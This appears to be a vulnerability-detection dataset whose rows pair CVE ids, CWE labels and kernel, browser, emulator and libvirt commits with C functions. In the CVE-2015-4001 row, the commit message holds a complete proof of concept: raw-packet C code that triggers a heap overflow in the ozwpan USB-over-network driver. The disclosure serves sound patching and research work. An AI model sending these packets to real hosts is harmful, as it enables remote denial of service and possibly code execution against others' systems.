ktype = OPENSSL_KEYTYPE_EC;
if (EVP_PKEY_get0_EC_KEY(pkey) != NULL) {
zval ec;
const EC_GROUP *ec_group;
const EC_POINT *pub;
int nid;
char *crv_sn;
ASN1_OBJECT *obj;
char oir_buf[80];
const EC_KEY *ec_key = EVP_PKEY_get0_EC_KEY(pkey);
BIGNUM *x = BN_new();
BIGNUM *y = BN_new();
const BIGNUM *d;
ec_group = EC_KEY_get0_group(ec_key);
nid = EC_GROUP_get_curve_name(ec_group);
if (nid == NID_undef) {
break;
}
array_init(&ec);
crv_sn = (char*) OBJ_nid2sn(nid);
if (crv_sn != NULL) {
add_assoc_string(&ec, "curve_name", crv_sn);
}
obj = OBJ_nid2obj(nid);
if (obj != NULL) {
int oir_len = OBJ_obj2txt(oir_buf, sizeof(oir_buf), obj, 1);
add_assoc_stringl(&ec, "curve_oid", (char*) oir_buf, oir_len);
ASN1_OBJECT_free(obj);
}
pub = EC_KEY_get0_public_key(ec_key);
if (EC_POINT_get_affine_coordinates_GFp(ec_group, pub, x, y, NULL)) {
OPENSSL_GET_BN(ec, x, x);
OPENSSL_GET_BN(ec, y, y);
} else {
php_openssl_store_errors();
}
if ((d = EC_KEY_get0_private_key(EVP_PKEY_get0_EC_KEY(pkey))) != NULL) {
OPENSSL_GET_BN(ec, d, d);
}
add_assoc_zval(return_value, "ec", &ec);
BN_free(x);
BN_free(y);
}
break;
#endif
default:
ktype = -1;
break;
}
add_assoc_long(return_value, "type", ktype);
BIO_free(out);
}
| C | php | 0 |
CVE-2015-1805 | https://www.cvedetails.com/cve/CVE-2015-1805/ | CWE-17 | https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | new helper: copy_page_from_iter()
parallel to copy_page_to_iter(). pipe_write() switched to it (and became
->write_iter()).
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | static inline void __pipe_unlock(struct pipe_inode_info *pipe)
{
mutex_unlock(&pipe->mutex);
}
| static inline void __pipe_unlock(struct pipe_inode_info *pipe)
{
mutex_unlock(&pipe->mutex);
}
| C | linux | 0 |
CVE-2015-4001 | https://www.cvedetails.com/cve/CVE-2015-4001/ | CWE-189 | https://github.com/torvalds/linux/commit/b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | static struct oz_urb_link *oz_remove_urb(struct oz_endpoint *ep,
struct urb *urb)
{
struct oz_urb_link *urbl;
if (unlikely(ep == NULL))
return NULL;
list_for_each_entry(urbl, &ep->urb_list, link) {
if (urbl->urb == urb) {
list_del_init(&urbl->link);
if (usb_pipeisoc(urb->pipe)) {
ep->credit -= urb->number_of_packets;
if (ep->credit < 0)
ep->credit = 0;
}
return urbl;
}
}
return NULL;
}
| static struct oz_urb_link *oz_remove_urb(struct oz_endpoint *ep,
struct urb *urb)
{
struct oz_urb_link *urbl;
if (unlikely(ep == NULL))
return NULL;
list_for_each_entry(urbl, &ep->urb_list, link) {
if (urbl->urb == urb) {
list_del_init(&urbl->link);
if (usb_pipeisoc(urb->pipe)) {
ep->credit -= urb->number_of_packets;
if (ep->credit < 0)
ep->credit = 0;
}
return urbl;
}
}
return NULL;
}
| C | linux | 0 |
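The heap overflow described in the commit message above comes from computing a copy length as the difference of two signed values and letting it go negative, which then wraps to a huge size_t inside memcpy(). A small self-contained illustration of that arithmetic and of the unsigned, explicitly checked variant; the function names are hypothetical, not the ozwpan code.

#include <string.h>

/* Bug pattern: both sizes are signed; if offset exceeds required_size the
 * difference is negative, and converting it to memcpy()'s size_t length
 * parameter yields an enormous value. Illustration only, never call it. */
void copy_broken(char *dst, const char *src, int required_size, int offset)
{
	memcpy(dst + offset, src, required_size - offset);
}

/* Fixed pattern: unsigned sizes plus an explicit consistency check before
 * any arithmetic that feeds a copy length. */
int copy_checked(char *dst, size_t dst_size, const char *src,
		 unsigned int required_size, unsigned int offset)
{
	if (offset > required_size || required_size > dst_size)
		return -1;
	memcpy(dst + offset, src, required_size - offset);
	return 0;
}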
CVE-2017-9375 | https://www.cvedetails.com/cve/CVE-2017-9375/ | CWE-835 | https://git.qemu.org/?p=qemu.git;a=commit;h=96d87bdda3919bb16f754b3d3fd1227e1f38f13c | 96d87bdda3919bb16f754b3d3fd1227e1f38f13c | null | static TRBCCode xhci_disable_slot(XHCIState *xhci, unsigned int slotid)
{
int i;
trace_usb_xhci_slot_disable(slotid);
assert(slotid >= 1 && slotid <= xhci->numslots);
for (i = 1; i <= 31; i++) {
if (xhci->slots[slotid-1].eps[i-1]) {
xhci_disable_ep(xhci, slotid, i);
}
}
xhci->slots[slotid-1].enabled = 0;
xhci->slots[slotid-1].addressed = 0;
xhci->slots[slotid-1].uport = NULL;
return CC_SUCCESS;
}
| static TRBCCode xhci_disable_slot(XHCIState *xhci, unsigned int slotid)
{
int i;
trace_usb_xhci_slot_disable(slotid);
assert(slotid >= 1 && slotid <= xhci->numslots);
for (i = 1; i <= 31; i++) {
if (xhci->slots[slotid-1].eps[i-1]) {
xhci_disable_ep(xhci, slotid, i);
}
}
xhci->slots[slotid-1].enabled = 0;
xhci->slots[slotid-1].addressed = 0;
xhci->slots[slotid-1].uport = NULL;
return CC_SUCCESS;
}
| C | qemu | 0 |
CVE-2017-5013 | https://www.cvedetails.com/cve/CVE-2017-5013/ | null | https://github.com/chromium/chromium/commit/8f3a9a68b2dcdd2c54cf49a41ad34729ab576702 | 8f3a9a68b2dcdd2c54cf49a41ad34729ab576702 | Don't focus the location bar for NTP navigations in non-selected tabs.
BUG=677716
TEST=See bug for repro steps.
Review-Url: https://codereview.chromium.org/2624373002
Cr-Commit-Position: refs/heads/master@{#443338} | base::string16 Browser::GetWindowTitleForCurrentTab(
bool include_app_name) const {
return GetWindowTitleFromWebContents(
include_app_name, tab_strip_model_->GetActiveWebContents());
}
| base::string16 Browser::GetWindowTitleForCurrentTab(
bool include_app_name) const {
return GetWindowTitleFromWebContents(
include_app_name, tab_strip_model_->GetActiveWebContents());
}
| C | Chrome | 0 |
CVE-2013-7271 | https://www.cvedetails.com/cve/CVE-2013-7271/ | CWE-20 | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int ltalk_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
if (!net_eq(dev_net(dev), &init_net))
goto freeit;
/* Expand any short form frames */
if (skb_mac_header(skb)[2] == 1) {
struct ddpehdr *ddp;
/* Find our address */
struct atalk_addr *ap = atalk_find_dev_addr(dev);
if (!ap || skb->len < sizeof(__be16) || skb->len > 1023)
goto freeit;
/* Don't mangle buffer if shared */
if (!(skb = skb_share_check(skb, GFP_ATOMIC)))
return 0;
/*
* The push leaves us with a ddephdr not an shdr, and
* handily the port bytes in the right place preset.
*/
ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4);
/* Now fill in the long header */
/*
* These two first. The mac overlays the new source/dest
* network information so we MUST copy these before
* we write the network numbers !
*/
ddp->deh_dnode = skb_mac_header(skb)[0]; /* From physical header */
ddp->deh_snode = skb_mac_header(skb)[1]; /* From physical header */
ddp->deh_dnet = ap->s_net; /* Network number */
ddp->deh_snet = ap->s_net;
ddp->deh_sum = 0; /* No checksum */
/*
* Not sure about this bit...
*/
/* Non routable, so force a drop if we slip up later */
ddp->deh_len_hops = htons(skb->len + (DDP_MAXHOPS << 10));
}
skb_reset_transport_header(skb);
return atalk_rcv(skb, dev, pt, orig_dev);
freeit:
kfree_skb(skb);
return 0;
}
| static int ltalk_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
if (!net_eq(dev_net(dev), &init_net))
goto freeit;
/* Expand any short form frames */
if (skb_mac_header(skb)[2] == 1) {
struct ddpehdr *ddp;
/* Find our address */
struct atalk_addr *ap = atalk_find_dev_addr(dev);
if (!ap || skb->len < sizeof(__be16) || skb->len > 1023)
goto freeit;
/* Don't mangle buffer if shared */
if (!(skb = skb_share_check(skb, GFP_ATOMIC)))
return 0;
/*
* The push leaves us with a ddephdr not an shdr, and
* handily the port bytes in the right place preset.
*/
ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4);
/* Now fill in the long header */
/*
* These two first. The mac overlays the new source/dest
* network information so we MUST copy these before
* we write the network numbers !
*/
ddp->deh_dnode = skb_mac_header(skb)[0]; /* From physical header */
ddp->deh_snode = skb_mac_header(skb)[1]; /* From physical header */
ddp->deh_dnet = ap->s_net; /* Network number */
ddp->deh_snet = ap->s_net;
ddp->deh_sum = 0; /* No checksum */
/*
* Not sure about this bit...
*/
/* Non routable, so force a drop if we slip up later */
ddp->deh_len_hops = htons(skb->len + (DDP_MAXHOPS << 10));
}
skb_reset_transport_header(skb);
return atalk_rcv(skb, dev, pt, orig_dev);
freeit:
kfree_skb(skb);
return 0;
}
| C | linux | 0 |
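The recvfrom/recvmsg record above describes its fix only in prose; the functions shown (ltalk_rcv) are unrelated AppleTalk receive paths from the same tree. A minimal sketch of the described pattern — treat a NULL user address exactly like a plain read() by leaving msg_name NULL — follows. This is illustrative kernel-style code, not the actual patch; recv_into_msg_sketch() is a hypothetical stand-in for the real sock_recvmsg() plumbing.
static long recvfrom_sketch(struct socket *sock, void __user *ubuf, size_t size,
			    struct sockaddr __user *addr, int __user *addr_len)
{
	struct sockaddr_storage address;
	struct msghdr msg;
	long err;

	/* Wire up msg_name only when the caller actually wants an address;
	 * with a NULL 'addr' the receive path behaves like a plain read(). */
	msg.msg_name = addr ? (struct sockaddr *)&address : NULL;
	msg.msg_namelen = 0;

	err = recv_into_msg_sketch(sock, &msg, ubuf, size);
	if (err >= 0 && addr && msg.msg_namelen) {
		/* Copy the source address back out only in the non-NULL case. */
		if (move_addr_to_user(&address, msg.msg_namelen, addr, addr_len))
			err = -EFAULT;
	}
	return err;
}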
CVE-2011-2479 | https://www.cvedetails.com/cve/CVE-2011-2479/ | CWE-399 | https://github.com/torvalds/linux/commit/78f11a255749d09025f54d4e2df4fbcb031530e2 | 78f11a255749d09025f54d4e2df4fbcb031530e2 | mm: thp: fix /dev/zero MAP_PRIVATE and vm_flags cleanups
The huge_memory.c THP page fault was allowed to run if vm_ops was null
(which would succeed for /dev/zero MAP_PRIVATE, as the f_op->mmap wouldn't
setup a special vma->vm_ops and it would fallback to regular anonymous
memory) but other THP logics weren't fully activated for vmas with vm_file
not NULL (/dev/zero has a not NULL vma->vm_file).
So this removes the vm_file checks so that /dev/zero also can safely use
THP (the other albeit safer approach to fix this bug would have been to
prevent the THP initial page fault to run if vm_file was set).
After removing the vm_file checks, this also makes huge_memory.c stricter
in khugepaged for the DEBUG_VM=y case. It doesn't replace the vm_file
check with a is_pfn_mapping check (but it keeps checking for VM_PFNMAP
under VM_BUG_ON) because for a is_cow_mapping() mapping VM_PFNMAP should
only be allowed to exist before the first page fault, and in turn when
vma->anon_vma is null (so preventing khugepaged registration). So I tend
to think the previous comment saying if vm_file was set, VM_PFNMAP might
have been set and we could still be registered in khugepaged (despite
anon_vma was not NULL to be registered in khugepaged) was too paranoid.
The is_linear_pfn_mapping check is also I think superfluous (as described
by comment) but under DEBUG_VM it is safe to stay.
Addresses https://bugzilla.kernel.org/show_bug.cgi?id=33682
Signed-off-by: Andrea Arcangeli <aarcange@redhat.com>
Reported-by: Caspar Zhang <bugs@casparzhang.com>
Acked-by: Mel Gorman <mel@csn.ul.ie>
Acked-by: Rik van Riel <riel@redhat.com>
Cc: <stable@kernel.org> [2.6.38.x]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static int khugepaged_has_work(void)
{
return !list_empty(&khugepaged_scan.mm_head) &&
khugepaged_enabled();
}
| static int khugepaged_has_work(void)
{
return !list_empty(&khugepaged_scan.mm_head) &&
khugepaged_enabled();
}
| C | linux | 0 |
CVE-2014-2739 | https://www.cvedetails.com/cve/CVE-2014-2739/ | CWE-20 | https://github.com/torvalds/linux/commit/b2853fd6c2d0f383dbdf7427e263eb576a633867 | b2853fd6c2d0f383dbdf7427e263eb576a633867 | IB/core: Don't resolve passive side RoCE L2 address in CMA REQ handler
The code that resolves the passive side source MAC within the rdma_cm
connection request handler was both redundant and buggy, so remove it.
It was redundant since later, when an RC QP is modified to RTR state,
the resolution will take place in the ib_core module. It was buggy
because this callback also deals with UD SIDR exchange, for which we
incorrectly looked at the REQ member of the CM event and dereferenced
a random value.
Fixes: dd5f03beb4f7 ("IB/core: Ethernet L2 attributes in verbs/cm structures")
Signed-off-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Signed-off-by: Roland Dreier <roland@purestorage.com> | int ib_cm_init_qp_attr(struct ib_cm_id *cm_id,
struct ib_qp_attr *qp_attr,
int *qp_attr_mask)
{
struct cm_id_private *cm_id_priv;
int ret;
cm_id_priv = container_of(cm_id, struct cm_id_private, id);
switch (qp_attr->qp_state) {
case IB_QPS_INIT:
ret = cm_init_qp_init_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTR:
ret = cm_init_qp_rtr_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTS:
ret = cm_init_qp_rts_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| int ib_cm_init_qp_attr(struct ib_cm_id *cm_id,
struct ib_qp_attr *qp_attr,
int *qp_attr_mask)
{
struct cm_id_private *cm_id_priv;
int ret;
cm_id_priv = container_of(cm_id, struct cm_id_private, id);
switch (qp_attr->qp_state) {
case IB_QPS_INIT:
ret = cm_init_qp_init_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTR:
ret = cm_init_qp_rtr_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTS:
ret = cm_init_qp_rts_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| C | linux | 0 |
CVE-2018-17570 | https://www.cvedetails.com/cve/CVE-2018-17570/ | CWE-190 | https://github.com/viabtc/viabtc_exchange_server/commit/4a7c27bfe98f409623d4d857894d017ff0672cc9#diff-515c81af848352583bff286d6224875f | 4a7c27bfe98f409623d4d857894d017ff0672cc9#diff-515c81af848352583bff286d6224875f | Merge pull request #131 from benjaminchodroff/master
fix memory corruption and other 32bit overflows | static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
| static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
| C | viabtc_exchange_server | 0 |
CVE-2012-2896 | https://www.cvedetails.com/cve/CVE-2012-2896/ | CWE-189 | https://github.com/chromium/chromium/commit/3aad1a37affb1ab70d1897f2b03eb8c077264984 | 3aad1a37affb1ab70d1897f2b03eb8c077264984 | Fix SafeAdd and SafeMultiply
BUG=145648,145544
Review URL: https://chromiumcodereview.appspot.com/10916165
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@155478 0039d316-1c4b-4281-b951-d872f2087c98 | static GLenum ExtractTypeFromStorageFormat(GLenum internalformat) {
switch (internalformat) {
case GL_RGB565:
return GL_UNSIGNED_SHORT_5_6_5;
case GL_RGBA4:
return GL_UNSIGNED_SHORT_4_4_4_4;
case GL_RGB5_A1:
return GL_UNSIGNED_SHORT_5_5_5_1;
case GL_RGB8_OES:
return GL_UNSIGNED_BYTE;
case GL_RGBA8_OES:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_EXT:
return GL_UNSIGNED_BYTE;
case GL_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_RGBA32F_EXT:
return GL_FLOAT;
case GL_RGB32F_EXT:
return GL_FLOAT;
case GL_ALPHA32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE_ALPHA32F_EXT:
return GL_FLOAT;
case GL_RGBA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_RGB16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_BGRA8_EXT:
return GL_UNSIGNED_BYTE;
default:
return GL_NONE;
}
}
| static GLenum ExtractTypeFromStorageFormat(GLenum internalformat) {
switch (internalformat) {
case GL_RGB565:
return GL_UNSIGNED_SHORT_5_6_5;
case GL_RGBA4:
return GL_UNSIGNED_SHORT_4_4_4_4;
case GL_RGB5_A1:
return GL_UNSIGNED_SHORT_5_5_5_1;
case GL_RGB8_OES:
return GL_UNSIGNED_BYTE;
case GL_RGBA8_OES:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_EXT:
return GL_UNSIGNED_BYTE;
case GL_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_RGBA32F_EXT:
return GL_FLOAT;
case GL_RGB32F_EXT:
return GL_FLOAT;
case GL_ALPHA32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE_ALPHA32F_EXT:
return GL_FLOAT;
case GL_RGBA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_RGB16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_BGRA8_EXT:
return GL_UNSIGNED_BYTE;
default:
return GL_NONE;
}
}
| C | Chrome | 0 |
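The commit title in the record above names SafeAdd and SafeMultiply, but the functions shown are an unrelated GL storage-format helper from the same change. The general shape of overflow-checked helpers of that kind, as a hedged standalone sketch — not Chromium's implementation; the function names and the uint32_t width are assumptions:
#include <stdbool.h>
#include <stdint.h>

static bool safe_add_u32(uint32_t a, uint32_t b, uint32_t *out)
{
	if (b > UINT32_MAX - a)
		return false;		/* a + b would wrap around */
	*out = a + b;
	return true;
}

static bool safe_mul_u32(uint32_t a, uint32_t b, uint32_t *out)
{
	if (a != 0 && b > UINT32_MAX / a)
		return false;		/* a * b would wrap around */
	*out = a * b;
	return true;
}
A caller checks the returned boolean before trusting *out, which is exactly the property the original unchecked arithmetic lacked.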
CVE-2013-4130 | https://www.cvedetails.com/cve/CVE-2013-4130/ | CWE-399 | https://cgit.freedesktop.org/spice/spice/commit/?id=53488f0275d6c8a121af49f7ac817d09ce68090d | 53488f0275d6c8a121af49f7ac817d09ce68090d | null | void red_channel_client_pipe_add_type(RedChannelClient *rcc, int pipe_item_type)
{
PipeItem *item = spice_new(PipeItem, 1);
red_channel_pipe_item_init(rcc->channel, item, pipe_item_type);
red_channel_client_pipe_add(rcc, item);
red_channel_client_push(rcc);
}
| void red_channel_client_pipe_add_type(RedChannelClient *rcc, int pipe_item_type)
{
PipeItem *item = spice_new(PipeItem, 1);
red_channel_pipe_item_init(rcc->channel, item, pipe_item_type);
red_channel_client_pipe_add(rcc, item);
red_channel_client_push(rcc);
}
| C | spice | 0 |
CVE-2016-10746 | https://www.cvedetails.com/cve/CVE-2016-10746/ | CWE-254 | https://github.com/libvirt/libvirt/commit/506e9d6c2d4baaf580d489fff0690c0ff2ff588f | 506e9d6c2d4baaf580d489fff0690c0ff2ff588f | virDomainGetTime: Deny on RO connections
We have a policy that if API may end up talking to a guest agent
it should require RW connection. We don't obey the rule in
virDomainGetTime().
Signed-off-by: Michal Privoznik <mprivozn@redhat.com> | virDomainBlockRebase(virDomainPtr dom, const char *disk,
const char *base, unsigned long bandwidth,
unsigned int flags)
{
virConnectPtr conn;
VIR_DOMAIN_DEBUG(dom, "disk=%s, base=%s, bandwidth=%lu, flags=%x",
disk, NULLSTR(base), bandwidth, flags);
virResetLastError();
virCheckDomainReturn(dom, -1);
conn = dom->conn;
virCheckReadOnlyGoto(conn->flags, error);
virCheckNonNullArgGoto(disk, error);
if (flags & VIR_DOMAIN_BLOCK_REBASE_COPY) {
virCheckNonNullArgGoto(base, error);
} else if (flags & (VIR_DOMAIN_BLOCK_REBASE_SHALLOW |
VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
VIR_DOMAIN_BLOCK_REBASE_COPY_RAW |
VIR_DOMAIN_BLOCK_REBASE_COPY_DEV)) {
virReportInvalidArg(flags, "%s",
_("use of flags requires a copy job"));
goto error;
}
if (conn->driver->domainBlockRebase) {
int ret;
ret = conn->driver->domainBlockRebase(dom, disk, base, bandwidth,
flags);
if (ret < 0)
goto error;
return ret;
}
virReportUnsupportedError();
error:
virDispatchError(dom->conn);
return -1;
}
| virDomainBlockRebase(virDomainPtr dom, const char *disk,
const char *base, unsigned long bandwidth,
unsigned int flags)
{
virConnectPtr conn;
VIR_DOMAIN_DEBUG(dom, "disk=%s, base=%s, bandwidth=%lu, flags=%x",
disk, NULLSTR(base), bandwidth, flags);
virResetLastError();
virCheckDomainReturn(dom, -1);
conn = dom->conn;
virCheckReadOnlyGoto(conn->flags, error);
virCheckNonNullArgGoto(disk, error);
if (flags & VIR_DOMAIN_BLOCK_REBASE_COPY) {
virCheckNonNullArgGoto(base, error);
} else if (flags & (VIR_DOMAIN_BLOCK_REBASE_SHALLOW |
VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
VIR_DOMAIN_BLOCK_REBASE_COPY_RAW |
VIR_DOMAIN_BLOCK_REBASE_COPY_DEV)) {
virReportInvalidArg(flags, "%s",
_("use of flags requires a copy job"));
goto error;
}
if (conn->driver->domainBlockRebase) {
int ret;
ret = conn->driver->domainBlockRebase(dom, disk, base, bandwidth,
flags);
if (ret < 0)
goto error;
return ret;
}
virReportUnsupportedError();
error:
virDispatchError(dom->conn);
return -1;
}
| C | libvirt | 0 |
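The libvirt record above says the missing piece was a read-only-connection check in virDomainGetTime(); the function shown (virDomainBlockRebase) already demonstrates the virCheckReadOnlyGoto pattern. A hedged sketch of the same guard applied to virDomainGetTime — simplified and illustrative, not libvirt's exact body:
int
virDomainGetTime_sketch(virDomainPtr dom, long long *seconds,
                        unsigned int *nseconds, unsigned int flags)
{
    virResetLastError();
    virCheckDomainReturn(dom, -1);
    virCheckReadOnlyGoto(dom->conn->flags, error);   /* the added guard */

    if (dom->conn->driver->domainGetTime) {
        if (dom->conn->driver->domainGetTime(dom, seconds, nseconds, flags) < 0)
            goto error;
        return 0;
    }
    virReportUnsupportedError();
 error:
    virDispatchError(dom->conn);
    return -1;
}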
